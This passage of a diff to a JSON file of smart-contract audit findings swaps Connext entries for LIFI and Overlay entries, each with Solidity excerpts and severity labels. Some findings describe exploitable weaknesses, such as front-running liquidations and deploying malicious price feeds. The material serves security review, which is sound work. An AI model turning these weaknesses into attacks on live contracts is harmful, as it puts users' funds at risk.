NATIVE_ASSETID) revert NullAddrIsNotAnERC20Token(); ... } function transferAsset(...) ... { ... (assetId == NATIVE_ASSETID) ... } }", "labels": [ "Spearbit", - "Connext", - "Severity: Low Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Redundant fee on transfer logic", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function repayAavePortalFor() has logic for fee on transfer tokens. However, handleIncomin- gAsset() doesnt allow fee on transfer tokens. So this extra code shouldnt be necessary in repayAavePortal- For(). function repayAavePortalFor(...) ... { ... (, uint256 amount) = AssetLogic.handleIncomingAsset(_adopted, total, 0); ... // If this was a fee on transfer token, reduce the total if (amount < total) { uint256 missing; unchecked { missing = total - amount; } if (missing < _feeAmount) { // Debit fee amount unchecked { _feeAmount -= missing; } } else { // Debit backing amount unchecked { missing -= _feeAmount; } _feeAmount = 0; _backingAmount -= missing; } } ... } library AssetLogic { function handleIncomingAsset(...) ... { ... // Transfer asset to contract trueAmount = transferAssetToContract(_assetId, _assetAmount); .... } function transferAssetToContract(address _assetId, uint256 _amount) internal returns (uint256) { ... // Validate correct amounts are transferred uint256 starting = IERC20(_assetId).balanceOf(address(this)); SafeERC20.safeTransferFrom(IERC20(_assetId), msg.sender, address(this), _amount); // Ensure this was not a fee-on-transfer token if (IERC20(_assetId).balanceOf(address(this)) - starting != _amount) { revert AssetLogic__transferAssetToContract_feeOnTransferNotSupported(); } ... } } 34", + "title": "Consider using wrapped native token", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The code currently supports bridging native tokens. However this has the following drawbacks: not every bridge supports native tokens; native tokens have an inherent risk of reentrancy; native tokens introduce additional code paths, which is more difficult to maintain and results in a higher risk of bugs. Also wrapped tokens are more composable. This is also useful for bridges that currently dont support native tokens like the AxelarFacet, the WormholeFacet, and the StargateFacet.", "labels": [ "Spearbit", - "Connext", - "Severity: Gas Optimization" + "LIFI", + "Severity: Informational" ] }, { - "title": "Some gas can be saved in reimburseLiquidityFees", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "Some gas can be saved by assigning tokenExchange before the if statement. This also improves readability. function reimburseLiquidityFees(...) ... { ... if (address(tokenExchanges[_token]) != address(0)) { // could use `tokenExchange` ITokenExchange tokenExchange = tokenExchanges[_token]; // do before the if }", + "title": "Incorrect event emitted", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Li.fi follows a two-step ownership transfer pattern, where the current owner first proposes an address to be the new owner. Then that address accepts the ownership in a different transaction via confirmOwnership- Transfer(): function confirmOwnershipTransfer() external { if (msg.sender != pendingOwner) revert NotPendingOwner(); owner = pendingOwner; pendingOwner = LibAsset.NULL_ADDRESS; emit OwnershipTransferred(owner, pendingOwner); } At the time of emitting OwnershipTransferred, pendingOwner is always address(0) and owner is the new owner. This event should be used to log the addresses between which the ownership transfer happens.", "labels": [ "Spearbit", - "Connext", - "Severity: Gas Optimization" + "LIFI", + "Severity: Informational" ] }, { - "title": "LIQUIDITY_FEE_DENOMINATOR could be a constant", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The value of LIQUIDITY_FEE_DENOMINATOR seems to be constant. However, it is currently stored in s and requires an SLOAD operation to retrieve it, increasing gas costs. upgrade-initializers/DiamondInit.sol: BridgeFacet.sol: BridgeFacet.sol: PortalFacet.sol: AssetLogic.sol: s.LIQUIDITY_FEE_DENOMINATOR = 10000; toSwap = _getFastTransferAmount(..., s.LIQUIDITY_FEE_DENOMINATOR); s.portalFeeDebt[_transferId] = ... / s.LIQUIDITY_FEE_DENOMINATOR; if (_aavePortalFeeNumerator > s.LIQUIDITY_FEE_DENOMINATOR) ... uint256 minReceived = (_amount * _slippageTol) / s.LIQUIDITY_FEE_DENOMINATOR;", + "title": "If statement does not check mintAmount properly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "On the zapIn function, mintAmount is checked with the following If statement. However, It is directly getting contract balance instead of taking difference between mintAmount and preMintBalance. ... ... uint256 mintAmount = IERC20(address(fToken)).balanceOf(address(this)); if (!success && mintAmount == 0) { revert MintingError(res); } mintAmount = mintAmount - preMintBalance;", "labels": [ "Spearbit", - "Connext", - "Severity: Gas Optimization" + "LIFI", + "Severity: Informational" ] }, { - "title": "Access elements from storage array instead of loading them in memory", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "SwapUtils.removeLiquidityOneToken() function only needs the length and one element of the storage array self.pooledTokens. For this, the function reads the entire array in memory which costs extra gas. IERC20[] memory pooledTokens = self.pooledTokens; ... uint256 numTokens = pooledTokens.length; ... pooledTokens[tokenIndex].safeTransfer(msg.sender, dy); 35", + "title": "Use address(0) for zero address", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Its better to use shorthands provided by Solidity for popular constant values to improve readability and likelihood of errors. address internal constant NULL_ADDRESS = 0x0000000000000000000000000000000000000000; //address(0)", "labels": [ "Spearbit", - "Connext", - "Severity: Gas Optimization" + "LIFI", + "Severity: Informational" ] }, { - "title": "Send information through calldata instead of having callee query Executor", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "Executor.originSender(), Executor.origin(), and Executor.amount() to permission crosschain calls. This costs extra gas because of staticcalls made to an external contract.", + "title": "Better variable naming", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "MAX_INT is defined to be the maximum value of uint256 data type: uint256 private constant MAX_INT = type(uint256).max; This variable name can be interpreted as the maximum value of int256 data type which is lower than type(uint256).max.", "labels": [ "Spearbit", - "Connext", - "Severity: Gas Optimization" + "LIFI", + "Severity: Informational" ] }, { - "title": "AAVE portal debt might not be repaid in full if debt is converted to interest paying", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The Aave portal mechanism gives routers access to a limited amount of unbacked debt which is to be used when fronting liquidity for cross-chain transfers. The process for receiving unbacked debt is as follows: During message execution, the protocol checks if a single liquidity provider has bid on a liquidity auction which is handled by the relayer network. If the provider has insufficient liquidity, the protocol attempts to utilize AAVE unbacked debt by minting uncol- lateralised aTokens and withdrawing them from the pool. The withdrawn amount is immediately used to pay out the recipient of the bridge transfer. Currently the debt is fixed fee, see arc-whitelist-connext-for-v3-portals, however this might be changed in the future out of band. Incase this would be changed: upon repayment, AAVE will actually expect unbackedDebt + fee + aToken interest. The current implementation will only track unbackedDebt + fee, hence, the protocol will accrue bad debt in the form of interest. Eventually, the extent of this bad debt will reach a point where the unbacked- MintCap has been reached and noone is able to pay off this debt. I consider this to be a long-term issue that could be handled in a future upgrade, however, it is important to highlight and address these issues early.", + "title": "Event is missing indexed fields", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Index event fields make the field more quickly accessible to off-chain tools that parse events. How- ever, note that each index field costs extra gas during emission, so its not necessarily best to index the maximum allowed per event (three fields).", "labels": [ "Spearbit", - "Connext", + "LIFI", "Severity: Informational" ] }, { - "title": "Routers pay the slippage cost for users when using AAVE credit", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "When routers do the fast of adopted token and _fastTransferAmount = * _fastTransferAmount /s.LIQUIDITY_FEE_DENOMINATOR _args.amount * s.LIQUIDITY_FEE_NUMERATOR / s.LIQUIDITY_FEE_DENOMINATOR. The routers get reimbursed _args.amount of local tokens afterward. Thus, the routers lose money if the slippage of swapping between local tokens and adopted tokens are larger than the liquidityFee. function _executePortalTransfer( bytes32 _transferId, bytes32 _canonicalId, uint256 _fastTransferAmount, address _router ) internal returns (uint256, address) { // Calculate local to adopted swap output if needed address adopted = s.canonicalToAdopted[_canonicalId]; ,! ,! ,! IAavePool(s.aavePool).mintUnbacked(adopted, _fastTransferAmount, address(this), AAVE_REFERRAL_CODE); // Improvement: Instead of withdrawing to address(this), withdraw directly to the user or executor to save 1 transfer uint256 amountWithdrawn = IAavePool(s.aavePool).withdraw(adopted, _fastTransferAmount, address(this)); if (amountWithdrawn < _fastTransferAmount) revert BridgeFacet__executePortalTransfer_insufficientAmountWithdrawn(); // Store principle debt s.portalDebt[_transferId] = _fastTransferAmount; // Store fee debt s.portalFeeDebt[_transferId] = (s.aavePortalFeeNumerator * _fastTransferAmount) / s.LIQUIDITY_FEE_DENOMINATOR; ,! emit AavePortalMintUnbacked(_transferId, _router, adopted, _fastTransferAmount); return (_fastTransferAmount, adopted); }", + "title": "Remove misleading comment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "WithdrawFacet.sol has the following misleading comment which can be removed. Its unclear why this comment was made. address self = address(this); // workaround for a possible solidity bug", "labels": [ "Spearbit", - "Connext", + "LIFI", "Severity: Informational" ] }, { - "title": "Optimize max checks in initializeSwap()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function initializeSwap() reverts if a value is >= ...MAX.... Probably should revert when > ...MAX.... function initializeSwap(...) ... { ... // Check _a, _fee, _adminFee, _withdrawFee parameters if (_a >= AmplificationUtils.MAX_A) revert SwapAdminFacet__initializeSwap_aExceedMax(); if (_fee >= SwapUtils.MAX_SWAP_FEE) revert SwapAdminFacet__initializeSwap_feeExceedMax(); if (_adminFee >= SwapUtils.MAX_ADMIN_FEE) revert SwapAdminFacet__initializeSwap_adminFeeExceedMax(); ... }", + "title": "Redundant events/errors/imports on the contracts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "During the code review, It has been observed that several events and errors are not used in the contracts. With the deleting redundant events and errors, gas can be saved. FusePoolZap.sol#L28 - CannotDepositNativeToken GenericSwapFacet.sol#L7 - ZeroPostSwapBalance WormholeFacet.sol#L12 - InvalidAmount and InvalidConfig HyphenFacet.sol#L32 - HyphenInitialized HyphenFacet.sol#L9 - InvalidAmount and InvalidConfig HopFacet.sol#L9 - InvalidAmount, InvalidConfig and InvalidBridgeConfigLength HopFacet.sol#L36- HopInitialized PolygonBridgeFacet.sol#L28 - InvalidConfig Executor.sol#L5 - IAxelarGasService AcrossFacet.sol#L37 - UseWethInstead, InvalidAmount, NativeValueWithERC, InvalidConfig NXTPFacet.sol#L9 - InvalidAmount, NativeValueWithERC, NoSwapDataProvided, InvalidConfig", "labels": [ "Spearbit", - "Connext", + "LIFI", "Severity: Informational" ] }, { - "title": "All routers share the same AAVE debt", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The mintUnbacked amount is allocated to the calling contract (eg the Connext Diamond that has the BRIDGE role permission). Thus it is not separated to different routers, if one router does not payback its debt (in time) and has the max debt then this facility cannot be used any more. function _executePortalTransfer( ... ) ... { ... IAavePool(s.aavePool).mintUnbacked(adopted, _fastTransferAmount, address(this), AAVE_REFERRAL_CODE); ... }", + "title": "forceSlow option is disabled on the AmarokFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "On the AmarokFacet contract, forceSlow option is disabled. According to documentation, forceS- low is an option that allows users to take the Nomad slow path (~30 mins) instead of paying routers a 0.05% fee on their transaction. ... IConnextHandler.XCallArgs memory xcallArgs = IConnextHandler.XCallArgs({ params: IConnextHandler.CallParams({ to: _bridgeData.receiver, callData: _bridgeData.callData, originDomain: _bridgeData.srcChainDomain, destinationDomain: _bridgeData.dstChainDomain, agent: _bridgeData.receiver, recovery: msg.sender, forceSlow: false, receiveLocal: false, callback: address(0), callbackFee: 0, relayerFee: 0, slippageTol: _bridgeData.slippageTol }), transactingAssetId: _bridgeData.assetId, amount: _amount }); ...", "labels": [ "Spearbit", - "Connext", + "LIFI", "Severity: Informational" ] }, { - "title": "Careful with fee on transfer tokens on AAVE loans", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The Aave function backUnbacked() does not account for fee on transfer tokens. If these happen to be used then the accounting might not be right. function _backLoan(...) ... { ... // back loan IAavePool(s.aavePool).backUnbacked(_asset, _backing, _fee); ... } library BridgeLogic { function executeBackUnbacked(... ) ... { ... reserve.unbacked -= backingAmount.toUint128(); reserve.updateInterestRates(reserveCache, asset, added, 0); IERC20(asset).safeTransferFrom(msg.sender, reserveCache.aTokenAddress, added); ... } }", + "title": "Incomplete NatSpec", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Some functions are missing @param for some of their parameters. Given that NatSpec is an impor- tant part of code documentation, this affects code comprehension, auditability and usability.", "labels": [ "Spearbit", - "Connext", + "LIFI", "Severity: Informational" ] }, { - "title": "Let getTokenPrice() also return the source of the price info", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function getTokenPrice() can get its prices information from multiple sources. For the caller it might be important to know which source was used. function getTokenPrice(address _tokenAddress) public view override returns (uint256) { }", + "title": "Use nonReentrant modifier in a consistent way", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "AxelarFacet, zapIn of the contract FusePoolZap and completeBridgeTokensViaStargate() - swapAndCom- pleteBridgeTokensViaStargate of the StargateFacet dont have a nonReentrant modifier. All other facets that integrate with the external contract do have this modifier. executeCallWithTokenViaAxelar of contract AxelarFacet { function executeCallWithTokenViaAxelar(...) ... { } function executeCallViaAxelar(...) ... { } } contract FusePoolZap { function zapIn(...) ... { } } There are 2 versions of sgReceive() / completeBridgeTokensViaStargate() which use different locations for nonReentrant. The makes the code more difficult to maintain and verify. contract StargateFacet is ILiFi, SwapperV2, ReentrancyGuard { function sgReceive(...) external nonReentrant { ... this.swapAndCompleteBridgeTokensViaStargate(lifiData, swapData, assetId, receiver); ... } function completeBridgeTokensViaStargate(...) external { ... } } contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function sgReceive(...) external { ... this.swapAndCompleteBridgeTokensViaStargate(lifiData, swapData, assetId, payable(receiver)); ... } function swapAndCompleteBridgeTokensViaStargate(...) external payable nonReentrant { } }", "labels": [ "Spearbit", - "Connext", + "LIFI", "Severity: Informational" ] }, { - "title": "Typos in the comments of _swapAsset() and _swapAssetOut()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "There are typos in the comments of _swapAsset() and _swapAssetOut(): * @notice Swaps assetIn t assetOut using the stored stable swap or internal swap pool function _swapAsset(... ) ... * @notice Swaps assetIn t assetOut using the stored stable swap or internal swap pool function _swapAssetOut(...) ...", + "title": "Typos on the codebase", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Across the codebase, there are typos on the comments. cancelOnwershipTransfer -> cancelOwnershipTransfer. addresss -> address. Conatains -> Contains. Intitiates -> Initiates.", "labels": [ "Spearbit", - "Connext", + "LIFI", "Severity: Informational" ] }, { - "title": "Consistently delete array entries in PromiseRouter", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "In function process() of PromiseRouter.sol two different ways are used to clear a value: one with delete and the other with = 0. Although technically the same it better to use the same method to maintain consistency. function process(bytes32 transferId, bytes calldata _message) public nonReentrant { ... // remove message delete messageHashes[transferId]; // remove callback fees callbackFees[transferId] = 0; ... }", + "title": "Store all error messages in GenericErrors.sol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The file GenericErrors.sol contains several error messages and is used from most other solidity files. However several other error messages are defined in the solidity files themselves. It would be more con- sistent and easier to maintain to store these in GenericErrors.sol as well. Note: the Periphery contract also contains error messages which are not listed below. Here are the error messages contained in the solidity files: Facets/AcrossFacet.sol:37: Facets/AmarokFacet.sol:31: Facets/ArbitrumBridgeFacet.sol:30: Facets/GnosisBridgeFacet.sol:31: Facets/GnosisBridgeFacet.sol:32: Facets/OmniBridgeFacet.sol:27: Facets/OptimismBridgeFacet.sol:29: Facets/OwnershipFacet.sol:20: Facets/OwnershipFacet.sol:21: Facets/OwnershipFacet.sol:22: Facets/OwnershipFacet.sol:23: Facets/PolygonBridgeFacet.sol:28: Facets/PolygonBridgeFacet.sol:29: Facets/StargateFacet.sol:39: Facets/StargateFacet.sol:40: Facets/StargateFacet.sol:41: Facets/WithdrawFacet.sol:20: Facets/WithdrawFacet.sol:21: Helpers/ReentrancyGuard.sol:20: Libraries/LibAccess.sol:18: Libraries/LibSwap.sol:9: error UseWethInstead(); error InvalidReceiver(); error InvalidReceiver(); error InvalidDstChainId(); error InvalidSendingToken(); error InvalidReceiver(); error InvalidReceiver(); error NoNullOwner(); error NewOwnerMustNotBeSelf(); error NoPendingOwnershipTransfer(); error NotPendingOwner(); error InvalidConfig(); error InvalidReceiver(); error InvalidConfig(); error InvalidStargateRouter(); error InvalidCaller(); error NotEnoughBalance(uint256 requested, uint256 available); error WithdrawFailed(); error ReentrancyError(); error UnAuthorized(); error NoSwapFromZeroBalance();", "labels": [ "Spearbit", - "Connext", + "LIFI", "Severity: Informational" ] }, { - "title": "getTokenPrice() will revert if setDirectPrice() is set in the future", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The setDirectPrice() function allows the protocol admin to update the price up to two seconds in the future. This impacts the getTokenPrice() function as the updated value may be slightly incorrect.", + "title": "Use unchecked in TickMath.sol and FullMath.sol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "Uniswap math libraries rely on wrapping behaviour for conducting arithmetic operations. Solidity version 0.8.0 introduced checked arithmetic by default where operations that cause an overflow would revert. Since the code was adapted from Uniswap and written in Solidity version 0.7.6, these arithmetic operations should be wrapped in an unchecked block.", "labels": [ "Spearbit", - "Connext", - "Severity: Low Risk" + "Overlay", + "Severity: High Risk" ] }, { - "title": "Roundup in words not optimal", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function words, which is used in the Nomad code base, tries to do a round up. Currently it adds 1 to the len. /** * @notice * @param memView * @return */ The number of memory words this memory view occupies, rounded up. The view uint256 - The number of memory words function words(bytes29 memView) internal pure returns (uint256) { return uint256(len(memView)).add(32) / 32; }", + "title": "Liquidation might fail", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The liquidate() function checks if a position can be liquidated and via liquidatable(), uses maintenanceMarginFraction as a factor to determine if enough value is left. However, in the rest of the liqui- date() function liquidationFeeRate is used to determine the fee paid to the liquidator. It is not necessarily true that enough value is left for the fee, as two different ways are used to calculate this which means that positions might be liquidated. This is classified as high risk because liquidation is an essential functionality of Overlay. contract OverlayV1Market is IOverlayV1Market { function liquidate(address owner, uint256 positionId) external { ... require(pos.liquidatable(..., maintenanceMarginFraction),\"OVLV1:!liquidatable\"); ... uint256 liquidationFee = value.mulDown(liquidationFeeRate); ... ovl.transfer(msg.sender, value - liquidationFee); ovl.transfer(IOverlayV1Factory(factory).feeRecipient(), liquidationFee); } } library Position { function liquidatable(..., uint256 maintenanceMarginFraction) ... { ... uint256 maintenanceMargin = posNotionalInitial.mulUp(maintenanceMarginFraction); can_ = val < maintenanceMargin; } } 4", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: High Risk" ] }, { - "title": "callback could have capped returnData", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function execute() caps the result of the call to excessivelySafeCall to a maximum of MAX_- COPY bytes, making sure the result is small enough to fit in a message sent back to the originator. However, when the callback is done the originator needs to be aware that the data can be capped and this fact is not clearly documented. 41 function execute(...) ... { ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall( _args.to, gas, isNative ? _args.amount : 0, MAX_COPY, _args.callData ); } function process(bytes32 transferId, bytes calldata _message) public nonReentrant { ... // execute callback ICallback(callbackAddress).callback(transferId, _msg.returnSuccess(), _msg.returnData()); // returnData is capped ... ,! }", + "title": "Rounding down of snapAccumulator might influence calculations", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The function transform() lowers snapAccumulator with the following equation: (snapAccumulator * int256(dt)) / int256(snapWindow). During the time that snapAccumulator * dt is smaller than snapWindow this will be rounded down to 0, which means snapAccumulator will stay at the same value. Luckily, dt will eventually reach the value of snapWindow and by then the value wont be rounded down to 0 any more. Risk lies in calculations diverging from formulas written in the whitepaper. Note: Given medium risk severity because the probability of this happening is high, while impact is likely low. function transform(...) ... { ... snapAccumulator -= (snapAccumulator * int256(dt)) / int256(snapWindow); ... }", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Medium Risk" ] }, { - "title": "Several external functions are not nonReentrant", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The following functions dont have nonReentrant, while most other external functions do have such modifier. bumpTransfer of BridgeFacet. forceReceiveLocal of BridgeFacet. repayAavePortal of PortalFacet. repayAavePortalFor of PortalFacet. initiateClaim of RelayerFacet. There are many swaps in the protocol and some of them should be conducted in an aggregator (not yet imple- mented). A lot of the aggregators use the difference between pre-swap balance and post-swap balance. (e.g. uniswap v3 router , 1inch, etc.. ). While this isnt exploitable yet, there is a chance that future updates might open up an issue to exploit.", + "title": "Verify pool legitimacy", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The constructor in OverlayV1UniswapV3Factory.sol and OverlayV1UniswapV3Feed.sol only does a partial check to see if the pool corresponds to the supplied tokens. This is accomplished by calling the pools functions but if the pool were to be malicious, it could return any token. Additionally, checks can be by- passed by supplying the same tokens twice. Because the deployFeed() function is permissionless, it is possible to deploy malicious feeds. Luckily, the de- ployMarket() function is permissioned and prevents malicious markets from being deployed. contract OverlayV1UniswapV3Factory is IOverlayV1UniswapV3FeedFactory, OverlayV1FeedFactory { constructor(address _ovlWethPool, address _ovl, ...) { ovlWethPool = _ovlWethPool; // no check on validity of _ovlWethPool here ovl = _ovl; } function deployFeed(address marketPool, address marketBaseToken, address marketQuoteToken, ...) external returns (address feed_) { // Permissionless ... // no check on validity of marketPool here } 5 } contract OverlayV1UniswapV3Feed is IOverlayV1UniswapV3Feed, OverlayV1Feed { constructor( address _marketPool, address _ovlWethPool, address _ovl, address _marketBaseToken, address _marketQuoteToken, ... ) ... { ... address _marketToken0 = IUniswapV3Pool(_marketPool).token0(); // relies on a valid _marketPool address _marketToken1 = IUniswapV3Pool(_marketPool).token1(); require(_marketToken0 == WETH || _marketToken1 == WETH, \"OVLV1Feed: marketToken != WETH\"); marketToken0 = _marketToken0; marketToken1 = _marketToken1; require( _marketToken0 == _marketBaseToken || _marketToken1 == _marketBaseToken, \"OVLV1Feed: marketToken != marketBaseToken\" ); require( _marketToken0 == _marketQuoteToken || _marketToken1 == _marketQuoteToken, \"OVLV1Feed: marketToken != marketQuoteToken\" ); marketBaseToken = _marketBaseToken; // what if _marketBaseToken == _marketQuoteToken == WETH ? marketQuoteToken = _marketQuoteToken; marketBaseAmount = _marketBaseAmount; // need OVL/WETH pool for ovl vs ETH price to make reserve conversion from ETH => OVL address _ovlWethToken0 = IUniswapV3Pool(_ovlWethPool).token0(); // relies on a valid ,! _ovlWethPool address _ovlWethToken1 = IUniswapV3Pool(_ovlWethPool).token1(); require( _ovlWethToken0 == WETH || _ovlWethToken1 == WETH, \"OVLV1Feed: ovlWethToken != WETH\" ); require( _ovlWethToken0 == _ovl || _ovlWethToken1 == _ovl, // What if _ovl == WETH ? \"OVLV1Feed: ovlWethToken != OVL\" ); ovlWethToken0 = _ovlWethToken0; ovlWethToken1 = _ovlWethToken1; marketPool = _marketPool; ovlWethPool = _ovlWethPool; ovl = _ovl; }", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Medium Risk" ] }, { - "title": "NomadFacet.reconcile() has an unused argument canonicalDomain", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "NomadFacet.reconcile() has an unused argument canonicalDomain.", + "title": "Liquidatable positions can be unwound by the owner of the position", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The liquidation function can be front-runned since it does not require any deposits. In particular, the liquidation function can be front-runned by the owner of the position by calling unwind. This effectively means that users can prevent themselves from getting liquidated by watching the mempool and frontrunning calls to their liquidation position by calling unwind. Although this behaviour is similar to liquidations in lending protocols where a borrower can front-run a liquidation by repaying the borrow, the lack of collateral requirements for both unwind and liquidation makes this case special. Note: In practice, transactions for liquidations do not end up in the public mempool and are often sent via private relays such as flashbots. Therefore, a scenario where the user finds out about a liquidatable position by the public mempool is likely not common. However, a similar argument still applies. Note: Overlay also allows the owner of the position to be the liquidator, unlike other protocols like compound. The difference in price computation for the liquidation and unwind mechanism may make it better for users to liquidate themselves rather than unwinding their position. However, a check similar to compound is not effective at preventing this issue since users can always liquidate themselves from another address.", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Low Risk" ] }, { - "title": "SwapUtils._calculateSwap() returns two values with different precision", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "SwapUtils._calculateSwap() returns (uint256 dy, uint256 dyFee). dy is the amount of tokens a user will get from a swap and dyFee is the associated fee. To account for the different token decimal precision between the two tokens being swapped, a multipliers mapping is used to bring the precision to the same value. To return the final values, dy is changed back to the original token precision but dyFee is not. This is an internal function and the callers adjust the fee precision back to normal, therefore severity is informa- tional. But without documentation it is easy to miss.", + "title": "Adding constructor params causes creation code to change", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "Using constructor parameters in create2 makes the construction code different for every case. This makes address calculation more complex as you first have to calculate the construction code, hash it and then do address calculation. Whats worse is that Etherscan does not properly support auto-verification of contracts deployed via create2 with different creation code. Youll have to manually verify all markets individually. Additionally, needless salt in OverlayV1Factory.sol#L129.", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Low Risk" ] }, { - "title": "Multicall.sol not compatible with Natspec", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "Multicall.sol Natspec comment specifies: /// @title Multicall - Aggregate results from multiple read-only function calls However, to call those functions it uses a low level call() method which can call write functions as well. (bool success, bytes memory ret) = calls[i].target.call(calls[i].callData);", + "title": "Potential wrap of timestamp", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "In the transform() function, a revert could occur right after timestamp32 has wrapped (e.g. when timestamp > 2**32). function transform(... , uint256 timestamp, ...) ... { uint32 timestamp32 = uint32(timestamp % 2**32); // mod to fit in uint32 ... uint256 dt = uint256(timestamp32 - self.timestamp); // could revert if timestamp32 has just wrapped ... }", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Low Risk" ] }, { - "title": "reimburseRelayerFees only what is necessary", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function reimburseRelayerFees() gives a maximum of relayerFeeCap to a receiver, unless it already has a balance of relayerFeeCap. This implicitly means that a balance relayerFeeCap is sufficient. So if a receiver already has a balance only relayerFeeCap - _to.balance is required. This way more recipients can be reimbursed with the same amount of funds in the SponsorVault. function reimburseRelayerFees(...) ... { ... if (_to.balance > relayerFeeCap || Address.isContract(_to)) { // Already has fees, and the address is a contract return; } ... sponsoredFee = sponsoredFee >= relayerFeeCap ? relayerFeeCap : sponsoredFee; ... }", + "title": "Verify the validity of _microWindow and _macroWindow", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The constructor of OverlayV1Feed doesnt verify the validity of _microWindow and _macroWindow, potentially causing the price oracle to produce bad results if misconfigured. constructor(uint256 _microWindow, uint256 _macroWindow) { microWindow = _microWindow; macroWindow = _macroWindow; }", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Low Risk" ] }, { - "title": "safeIncreaseAllowance and safeDecreaseAllowance can be replaced with safeApprove in _recon- cileProcessPortal", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The NomadFacet uses safeIncreaseAllowance after clearing the allowance. creaseAllowance to clear the allowance. Using safeApprove is potentially safer in this case. Some non-standard tokens only allow the allowance to change from zero, or change to zero. Using safeDecreaseAllowance would potentially break the contract in a future update. Note that SafeApprove has been deprecated for the concern of a front-running attack. It is only supported when setting an initial allowance or setting the allowance to zero SafeERC20.sol#L38", + "title": "Simplify _midFromFeed()", + "html_url": 